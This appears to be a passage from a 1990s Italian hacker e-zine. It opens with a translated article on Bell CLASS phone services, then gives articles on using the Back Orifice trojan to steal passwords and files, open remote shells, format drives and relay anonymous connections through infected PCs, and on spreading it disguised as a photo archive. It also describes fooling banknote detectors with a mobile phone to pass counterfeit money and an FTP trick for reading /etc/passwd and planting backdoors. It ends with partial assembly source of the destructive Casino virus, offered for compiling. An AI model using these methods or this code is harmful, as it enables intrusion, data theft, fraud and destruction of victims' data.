Operating Company) definira' il numero massimo di numeri che verranno trac-
ciati. Una volta fatto cio', il cliente riaggancia e l'ESS riprende il con-
trollo. Ora, quando qualcuno chiami questo particolare utente, il selettore
dell'utente confrontera' il numero del chiamante con quelli memorizzati
nella memoria di 'scratch pad'.Se il CLID (Caller ID) corrisponde ad uno dei
numeri nella memoria 1A associata al numero chiamato, la chiamata verra'
trasferita. Se questo non accadra', il telefono suonera' alla sua postazione
originale. In particolare questo puo' rendere la vita difficile agli hackers
del sistema, come probabilmente immagini. Una compagnia puo' iscriversi a
questo servizio CLASS, ed inserire solo i numeri degli utenti autorizzati ad
essere trasferiti ad un terminale. Inoltre, usando questo servizio, sara'
possibile, da parte delle compagnie telefoniche, registrare le telefonate a
numeri particolari.

Questo tipo di sicurezza e' difficile da eludere, ma naturalmente c'e' un
modo (semplice legge di natura: nulla e' perfetto). Ci sara' sempre il modo
ovvio di trovare i numeri a cui vengono trasferiti, come comporre automatica-
mente interi scambi (uno dopo l'altro). Sfortunatamente, CLASS fornira'
altri servizi che renderanno lo 'scanning' un attivita' meno frequente.

Suoneria Differenziata
----------------------

La suoneria differenziata e' gestita e' gestita allo stesso modo dello
inoltro di chiamata selettivo: l'elenco dei numeri nella memoria di 'scratch
pad'. Il cliente puo' inserire numeri a cui l'ESS dara' una speciale prece-
denza e, quando una chiamata giunge a questo particolare numero del cliente,
l'ESS controlla se il CLID corrisponde ad uno dei numeri nell'elenco della
'scratch'. Se corrisponde, il CO del cliente invia all'apparecchio agganciato
uno speciale tono di chiamata in arrivo, oppure invia all'apparecchio non ag-
ganciato uno squillo alternativo (probabilmente usando voltaggio di 'ring'
temporizzato in modo anormale... alcuni lettori possono pensare all'esempio
dello squillo della British Telecom, sebbene molti squilli stranieri tendano
a differenziarsi gli uni dagli altri).

Rifiuto di Chiamata
-------------------

Il rifiuto di chiamata, un servizio che rende possibile impedire a certi
idioti di far squillare il tuo telefono (un servizio di cui tutti possiamo
beneficiare in certi momenti... oppure sempre), si serve delle informazioni
recuperate dal LCCIS (CLID). Mettiamo che l'utente A chiami l'utente B:

----LCCIS----
A ---> CO< >CO ---> B
----trunk----

L'utente B desidera rifiutare la chiamata dell'utente A, e compone un
codice speciale *##. L'ESS riprende il controllo di nuovo, recupera il CLID
di A e memorizza il tutto in una speciale lista associata all'utente B. La
volta successiva che il cliente A cerchera' di chiamare B, l'ufficio di ter-
minazione reinstradera' la chiamata in un locale (il CO originante) registra-
tore digitale il quale dira' all'utente A che la chiamata fatta non puo' es-
sere completata data l'esplicita richiesta di B ("Spiacente, l'utente da lei
chiamato desidera che lei venga divorato da un cannibale rabbioso...").

Richiamata (Dial Back)
----------------------

Per creare un servizio come il "dial back" (per la parte chiamata o chia-
mante), la memoria di 'scratch pad' dell'ESS entra in gioco di nuovo. Gli
stesi principi vengono impiegati nel gia' presente auto-redial (ricomposizio-
ne ultimo numero). Il CLID verra' usato in questo modo:

(ricevuto dal CLID)
memoria ultimo chiamato memoria ultimo chiamante
---------- ----------
|###-####| |###-####|
---------- ----------

Il tuo selettore ESS terra' traccia di chi hai chiamato per ultimo, e di
chi ti ha chiamato per ultimo, attraverso il recupero delle informazioni for-
nite dall'LCCIS insieme col tuo selettore (il tuo selettore verra' a conosce-
nza dell'ultimo numero da te composto memorizzando direttamente i numeri di-
gitati precedentemente. La segnalazione locale fornira' le informazioni
della linea chiamante prelevandole dalle informazioni di chiamata del'LCCIS
usando il collegamento dati sopra menzionato). In questo modo, con il tuo
codice di accesso (*##), avrai il servizio di ricomposizione totalmente a
disposizione.

Tracciamento dell'Utente
------------------------

Questo tipo di gestione della memoria e di metodo di segnalazione permet-
tera' inoltre il servizio, che tutti temono, abolira' il "phreaking". Il
tracciamento iniziato dall'utente, usando l'ultimo numero chiamante presente
nel tuo CO, sara' disponibile appena i Bell Laboratories ne verranno a cono-
scenza. Sembra che ci siano due tipi "tracciamento originato dall'utente".
Uno inoltrera' il numero alle autorita' locali dove sara' gestito tramite la
polizia. L'altro tipo, a cui la AT&T/Bell Labs sta lavorando e' un display
posizionato vicino al telefono che mostrera' il numero chiamante. Tutti gli
altri servizi CLASS che fanno uso dell'informazione della linea chiamante
vengono usati a discrezione dell'chiamante. Il tracciamento originato dall'u-
tente, comunque, usando le informazioni del chiamante a linea singola o
'bulk' sara' permettera' al cliente di vedere il numero del chiamante. Il
mondo non sta per finire... pero', in ogni caso. Clienti singoli potranno'
usare un 'privacy code' speciale, che quando composto, dice al selettore
dall'altra parte di non inoltrare il numero del chiamante ad un display. Se
ci sia un modo per evitare cio' e' ovvio: naturalmente. La polizia ed il go-
verno sembrano avere una priorita' maggiore di quella della tua privacy. Sem-
bra che le portanti a lunga distanza potranno beneficiare del CLASS. Ecco pe-
rche' la Bell/AT&T dovrebbe dare tutti i tipi di servizi speciali agli OCCs
non dati ad altre compagnie telefoniche, specialmente dopo che l'accesso
'equal' e' stato implementato, non so (ma di nuovo, e' accesso 'EQUAL'). E'
comunque possibile che non ci sara' nessun display. Ci sono dei phreakers
che sentono che il BOC non dara' mai alla parte ricevente il privilegio di
ricavare l'informazione del chiamante direttamente, se non a causa del
vecchio comportamento della Bell circa la privacy. Dovremo aspettare e
vedere circa quel punto: il display e' attualmente funzionante ed e' in
beta-testing. Se i Bell Labs sentono che questo servizio puo' e sara' usato
in larga scala a stadio non-beta nelle BOC e' tutta un'altra storia.

Note Finali
-----------

Il CLASS, usando il CCIS locale, non funzionera' nelle chiamate
intra-LATA. La rete CCIS locale e' proprio questo: locale, e non si estende
fino alla rete di tariffa. Questo sara' eventualmente corretto (permettendo
al CCIS di tariffa di interagire con l'LCCIS quando si tratta di
informazione su CLID). Non e' stato determinato [dall'autore dell'articolo]
come le varie reti a lunga distanza scambieranno informazioni con la rete
locale del BOC.
Sembrerebbe un compito difficilissimo quello di cercare di integrare le co-
mpagnie emergenti a lunga distanza nell'AT&T/BOC ISDN, a causa delle inconsi-
stenze dell equipaggiamento o della mancanza di cooperazione da parte della
OCC ecc. ecc. Si parlera' di questo in un successivo articolo che trattera'
della rete di tariffa CCIS. Sebbene il CLASS ruoti attorno al selettore ESS
#1A, e' stato, come menzionato, co-sviluppato per l'utilizzo con la macchina
di selezione ESS 5.

Il CLASS causera' problemi, come creera' un nuovo ambiente per gli utenti
telefonici. Naturalmente, quei problemi sono veri problemi solo per le per-
sone che in generale stanno leggendo questo articolo, ma piu' si conosce
circa il CLASS piu' comodi ci si sentira' grazie al servizio. Puo' essere
usato a proprio vantaggio, persino come hobbysta delle telecomunicazioni.
Proprio come una corporazione sara' in grado di costruire una storia completa
di chi chiama il loro sistema, ed eventualmente tenere la gente fuori dal
loro sistema con la 'blacklist', lo stesso si puo' applicare alle BBSs e
simili. Immagina di poter essere in grado di tenere alla larga dalla tua
BBS tutti i malviventi locali, o di essere in grado rifiutare tutto il traf-
fico eccetto quello degli utenti registrati (rendendo il tuo sistema comple-
tamente inaccessibile dalla rete PSTN da qualsiasi telefono eccetto quelli
dei tuoi utenti registrati). Sembra essere un servizio utile, almeno e' fa-
cile da implementare.

E' un po' difficile, se non proprio inopportuno, scrivere un articolo su
di un soggetto sempre in cambiamento secondo l'ignoranza del ricercatore.
Penso che il CLASS sia un evento di grande momento che almeno sara' rilascia-
to qualche testo da qualche hobbysta per la conoscenza pubblica. So' percio'
che alcune parti di questo testo saranno 'scadute', od inaccurate, quando il
CLASS verra' rilasciato come servizio BOC, cio' spiega dunque perche' c'e' un
numero di versione nella testata di quest'articolo. Probabilmente, quando il
CLASS diventera' pubblico, la seconda versione sara' rilasciata con le note
di aggiornamento (se deve essere, sia... probabilmente cosi'). Spero ti sia
servito,

The Videosmith.
LOD/LOH!

------------------------------------------
Standard allo stadio di test per alcuni
servizi:

DTMF ! Pulse ! Descrizione del Servizio
------------------------------------------
*66 ! 1166 ! Riconnetti Ultimo Chiamante
------------------------------------------
*63 ! 1163 ! Inoltro Chiamate Selettivo
------------------------------------------
*60 ! 1160 ! Rifiuto di Chiamata
------------------------------------------
*57 ! 1157 ! "Customer Trace"
------------------------------------------

Nota: Questi codici di comando possono variare da BOC a BOC. I codici sopra
elencati sono stati estratti da una descrizione generale del CLASS e non
specificavano particolari implementazioni dei detti servizi.


Riconoscimenti:

* Mark Tabas per i suoi punti di vista su alcune parti dell'articolo...
per esempio, tracciamento dell'utente ("FUCK NO").
* Doctor <413> Who
* Mr. DNA

-> Tradotto Da NightWolf [Under Construction]

>> mitici traduttori .... ma parlando di storia contemporanea ..... <<

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ þ [Applicazioni malsane del Back Orifice] UnDeR CoNsTrUcTiOn ³
³ [HaCkInG SeCtIoN] Articolo di: TrUsA ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

By TrUsA (9/9/98)

Tutti ormai hanno sentito parlare del famoso Back Orifice, che a detta
di RAIDUE "consente ad ognuno di diventare Hacker" , ebbene questo tool
e' piu' potente di quanto si possa pensare non solo per il fatto di
"poter entrare nel tuo computer" (frase che assilla tutti i Lamer del
mondo) ma per nuove applicazione che ho avuto il piacere di sperimentare.
Premetto intanto che l'installazione del bo a puro scopo distruttivo
oltre che eticamente sbagliato (a meno che non si tratti di uno stronzo
neanche degno di questo nome) e anche dannoso in quanto se qualcuno si
vede cancellare dir o comparire messaggi di sistema con scritto "sei in
mio potere" si preoccupa immediatamente di installare un antidoto e addio
back.
E' molto piu' utile secondo me mantenere l'accesso su quel computer il
piu' a lungo possibile per svariati motivi......
Con un semplice comando si possono ricavare tutte le password presenti
nella cache di windows e questo puo' far guadagnare simpatici account
senza grossi sforzi.
Ma gli usi piu' perfidi e malefici sono ben altri.
Sarebbe interessante poter prelevare dei file personali o vedere immagini
presenti nell'hd del malcapitato, ma le funzioni di trasferimento comprese
nel Bo sono complesse e non immediate. Sarebbe molto piu' comodo poter
sfogliare l'hd con il nostro amato browser.
Questo e' possibile usando la funzione HTTP ENABLE, settando la porta 80
e come root directory ad esempio c: poi collegarsi con il browser all'IP
della vittima, per ottenere cosi' la possibilita' di downloadare o
uploadare file con un doppio click.
Se proprio qualcuno ci sta sul culo sarebbe simpatico formattargli c: anche
se ribadisco il concetto che cio' puo' essere dannoso piu' per noi visto
che piu' macchine infette ci sono in rete meglio e' per scopi ben piu'
nobili che il vandalismo. Per fare cio' bisogna comandare un Prompt di Dos
sul computer ospite, questo si ottiene con la funzione APPADD mettendo
c:\command.com come EXE_location e 23 come porta e collegandosi poi in
telnet all'IP della vittima con la porta 23. Otterremo cosi' la possibilita'
di usare comandi come deltree o format o di lanciare piccoli programmi dos
e averne il controllo via telnet.
Ma veniamo all'aspetto che secondo me e' il piu' valido e utile a coloro
che vogliono mantenere l'anonimato per scopi piu' o meno legittimi.
E' molto antipatico che qualunque server visitato, sia ftp o telnet,
registri su dei log il nostro IP e allora perche' non usare l'IP di un altro
per i porci comodi nostri ?
Questo oggi e' possibile grazie alla funzione REDIRADD configurando come
In Port una porta non occupata del sistema infettato (ad es. 666) e come
Out Port l'IP del server in cui vogliamo entrare settando come porta 21,23
a seconda che sia rispettivamente ftp o telnet. E' possibile usare questa
applicazione anche per i server irc settando la porta 6667 o 6668 ottenendo
cosi' sessioni di chat perfettamente anonime. L'unica limitazione e' che
siamo vincolati dalla presenza del IP infetto sulla rete e proprio per
questo motivo e' meglio che i PC colpiti da Bo siano molti.
Per questo ogni occasione e' valida per dare in giro il boserve attaccandolo
a qualche exe da dare a dei Lamer o spacciandolo per zip autoscompattante di
foto porno di mia sorella :))))
Questo e' tutto, vado a dare il boserve in giro....Byez

TrUsA (un untore del 2000) ;)

"It's always the same, running toward nothing, again and again and again"
By R.Smith 1980
(Non c'entra un cazzo pero' mi piaceva) ;)
(eheheh ne sono convinto) ;) By Li-Nux

>> Trusa , master nonke' kollaudatore pazzo !!!!! <<
>> Ecco qui il nostro Chat, con un bel metodo malsano... <<
[LEGGETE GENTE... LEGGETE :)] (questo lo ha detto prima madsem :)

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ þ [NonSoloPhreakin'] UnDeR CoNsTrUcTiOn ³
³ [PhReAk SeCtIoN] Articolo di: ChatR0bot ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Ho trovato una simpatica applicazione del cellulare GSM
(non so se funziona anche con i TACS) quando volete pagare
i vostri acquisti con della carta straccia ma il negoziante ha il
rivelatore di banconote false.

Mi riferisco al rivelatore di inchiostro magnetico, che porta nella
sua parte anteriore una testina del tutto simile a quella dei lettori di
audiocassette. Bene, se PRIMA che venga testata la banconota, accendete il
telefonino e componete un numero, assicuratevi che il telefonino si COLLEGHI
con quel numero e ... badabem badabem! il rivelatore di banconote
riconoscera' la carta straccia come se fosse denaro vero e suonera' il
fatidico beep.

Questo avviene perche' la testina del rivelatore intercetta le variazioni
del campo magnetico prodotte dal cellulare, e quindi suona anche se lo puntate
in aria :)

Ora, ATTENZIONE. Il cellulare deve trovarsi in un area di circa 1 - 1,5
metri dal rivelatore di banconote (forse anche di piu', dipende dalla
potenza in TX del vs. cello); e se volete chiamare un numero senza
disturbare casa vostra o la vostra ragazza, se avete un cellulare TIM
chiamate il 916 che e' gratuito! Ci sarebbe da fare ora una ricerca
accurata sul modo in cui i DISTRIBUTORI AUTOMATICI con lettore di banconote
discriminano le vere dalle false....
uhm.... magari si riescono a fottere anche quelli!!!

Ciao!

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ þ [Vecchi server... servono...] UnDeR CoNsTrUcTiOn ³
³ [HaCkInG SeCtIoN] Articolo di: Li-Nux ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Okay, adesso vi mostrero' un trucco molto vecchio, che pero' funziona
su molte vecchie universit… (soprattutto americane) !!! Provate, Provate,
provate, ...

VI ASSICURO !!! ANCORA FUNZIONA :)

Tenete presente winzozz '95 ? No ?!? Quel sistema creato dalla Mi[r0s0ft...
vabbŠ... non lo conoscete, comunque se vi capita di averlo andate nel
prompt di MS-DOS, siete nella directory WINDOWS, scrivete:

ftp ftp.universit…delcazzo.com (non credo ci sia bisogno di dirvi che
dovete metterci l'hostname dell ftp vostro
?!? :)

quando vi verr… chiesto login e password non mettete nulla, premete invio.
OK, adesso scrivete:

quote user ftp
quote cwd ~root
quote pass ftp

0kIz... cosa vorreste fare di bello in questo ftp ??? Entrare nella
directory etc e prendere il file passwd :)
FATELO !!! Se quello che avete fatto funziona e il server Š vecchiotto...
AVETE ACCESSO ROOT !!! :)))

Se questo trucco vi Š riuscito... sono felicissimo per voi !!! Adesso avete
il vostro accesso root, la shellina, vi fate delle backdoor, insomma vi
divertirete un sacco :)

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ þ [CaSiNo... vi fara' tremare] UnDeR CoNsTrUcTiOn ³
³ [ViRiI SeCtIoN] Articolo di: Li-Nux ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Virii la piu' bella passione esistente !!! Questo non Š esattamente
un articolo... ma il codice sorgente con i commenti in inglese di uno
dei virus che ha fatto tremare i computer, quando lo si ha, bisogna
essere molto fortunati per rimuoverlo... voi direte, ma che cazzo dice
questo stronzo, con un antivirus lo tolgo... non so se ne avrete il
tempo... Quando il virus Casino, vi far… giocare con lui avrete 1/16
di possibilit… che il virus se ne va completamente, ecco il nome
Casino', la cosa bella Š che non potete resettare in modo piu'
assoluto il computer, perchŠ canceller… tutti i dati !!!

--------------------------------------------------------------------
|----- ECCO A VOI IL CODICE SORGENTE !!!!! -----|
------------------------------------------------------------------------------
ATTENZIONE !!! SE COMPILATE IL VIRUS DOVRETE CANCELLARE L'INTRODUZIONE FINO
ALLA RIGA SUCCESSIVA A QUESTA.
------------------------------------------------------------------------------

PAGE 59,132

;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ CASINO ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 31-Aug-90 ÛÛ
;ÛÛ Version: ÛÛ
;ÛÛ Passes: 9 Analysis Options on: H ÛÛ
;ÛÛ Copyright S & S International, 1990 ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ

data_1e equ 60Ch ; (0000:060C=0)
data_2e equ 60Dh ; (0000:060D=0)
data_3e equ 60Eh ; (0000:060E=0)
data_4e equ 60Fh ; (0000:060F=0)
data_5e equ 610h ; (0000:0610=0)
data_6e equ 611h ; (0000:0611=0)
data_7e equ 612h ; (0000:0612=0)
data_8e equ 2 ; (6AE6:0002=0)
data_10e equ 3Bh ; (6AE6:003B=0)
data_11e equ 3Dh ; (6AE6:003D=0)
data_12e equ 3Fh ; (6AE6:003F=0)
data_13e equ 40h ; (6AE6:0040=0)
data_14e equ 41h ; (6AE6:0041=0)
data_15e equ 43h ; (6AE6:0043=6AE6h)
data_16e equ 45h ; (6AE6:0045=0)
data_17e equ 47h ; (6AE6:0047=6AE6h)
data_18e equ 4Dh ; (6AE6:004D=0)
data_19e equ 68h ; (6AE6:0068=0)
data_20e equ 7Eh ; (6AE6:007E=0)
data_21e equ 80h ; (6AE6:0080=0)
data_33e equ 716Eh ; (6AE6:716E=0)

seg_a segment byte public
assume cs:seg_a, ds:seg_a


org 100h

casino proc far

start:
nop
data_23 db 0E9h
data_24 db 48h
data_25 db 7, 'ello - Copyright S & S Intern'
db 'ational, 1990', 0Ah, 0Dh, '$'
db 1Ah
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AA'
db 0E6h
db 'jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'

casino endp

;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;
; External Entry Point
;
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ

int_24h_entry proc far
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
inc cx
mov ah,9
mov dx,offset data_25 ; (6AE6:0103=7)
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
int 20h ; Program Terminate
db 0, 0, 0, 0, 0, 0Fh
db 0, 0, 0E9h, 0D3h, 1, 0E9h
db 0, 0, 0, 90h, 0E9h, 78h
db 2Ah, 2Ah, 2Eh, 43h, 4Fh, 4Dh
db 0
db 'C:\COMMAND.COM'
db 0, 43h, 4Fh, 4Dh, 4Dh, 41h
db 4Eh, 44h, 0FFh
db 2Eh, 43h, 4Fh, 4Dh
db 15 dup (0)
db 3Fh, 0, 0F0h, 3, 2, 0
db 0B3h, 4Bh, 0FCh, 91h, 56h, 5
db 79h, 10h, 0, 0, 0, 0
db 0, 3
db 8 dup (3Fh)
db 43h, 4Fh, 4Dh, 3Fh, 8, 0
db 1Eh, 2, 2Eh, 8Bh, 26h, 68h
db 20h, 0A9h, 8Eh, 1Fh, 15h, 0E8h
db 3, 0, 0
db 'H1000.COM'
db 9 dup (0)
db 1Fh, 15h, 0A9h, 8Eh, 90h, 90h
db 3Dh, 59h, 4Bh, 75h, 4, 0B8h
db 66h, 6, 0CFh, 80h, 0FCh, 11h
db 74h, 8, 80h, 0FCh, 12h, 74h
db 3, 0EBh, 51h, 90h
loc_2:
cmp al,66h ; 'f'
je loc_4 ; Jump if equal
mov al,66h ; 'f'
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
push ax
push bx
push cx
push dx
push es
mov ah,2Fh ; '/'
int 21h ; DOS Services ah=function 2Fh
; get DTA ptr into es:bx
mov al,es:[bx+10h]
cmp al,43h ; 'C'
jne loc_3 ; Jump if not equal
mov al,es:[bx+11h]
cmp al,4Fh ; 'O'
jne loc_3 ; Jump if not equal
mov al,es:[bx+12h]
cmp al,4Dh ; 'M'
jne loc_3 ; Jump if not equal
mov ax,es:[bx+24h]
cmp ax,91Ah
jb loc_3 ; Jump if below
sub ax,91Ah
mov cx,ax
push cx
mov cx,10h
mov dx,0
div cx ; ax,dx rem=dx:ax/reg
pop cx
cmp dx,0
jne loc_3 ; Jump if not equal
mov es:[bx+24h],cx
loc_3:
pop es
pop dx
pop cx
pop bx
pop ax
iret ; Interrupt return
int_24h_entry endp

loc_4:
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es
mov bx,cs
mov ds,bx
mov al,0
mov ds:data_18e,al ; (6AE6:004D=0)
mov al,ds:data_13e ; (6AE6:0040=0)
cmp al,0FFh
jne loc_5 ; Jump if not equal
jmp loc_15 ; (06B2)
loc_5:
mov al,0FFh
mov ds:data_13e,al ; (6AE6:0040=0)
cmp ah,4Bh ; 'K'
je loc_6 ; Jump if equal
cmp ah,36h ; '6'
je loc_7 ; Jump if equal
jmp loc_15 ; (06B2)
loc_6:
mov ah,19h
int 21h ; DOS Services ah=function

  
19h
; get default drive al (0=a:)
mov ds:data_12e,al ; (6AE6:003F=0)
jmp short loc_8 ; (0624)
db 90h
loc_7:
mov ah,19h
int 21h ; DOS Services ah=function 19h
; get default drive al (0=a:)
mov ds:data_12e,al ; (6AE6:003F=0)
cmp dl,0
je loc_8 ; Jump if equal
dec dl
mov ah,0Eh
int 21h ; DOS Services ah=function 0Eh
; set default drive dl (0=a:)
loc_8:
mov ah,19h
int 21h ; DOS Services ah=function 19h
; get default drive al (0=a:)
cmp al,1
ja loc_9 ; Jump if above
mov ch,0
push ds
pop es
mov bx,917h
mov al,1
call sub_3 ; (07DB)
mov al,1
call sub_4 ; (07EC)
cmp ah,0
je loc_9 ; Jump if equal
jmp short loc_14 ; (069C)
db 90h
loc_9:
mov ah,2Fh ; '/'
int 21h ; DOS Services ah=function 2Fh
; get DTA ptr into es:bx
mov ds:data_14e,bx ; (6AE6:0041=0)
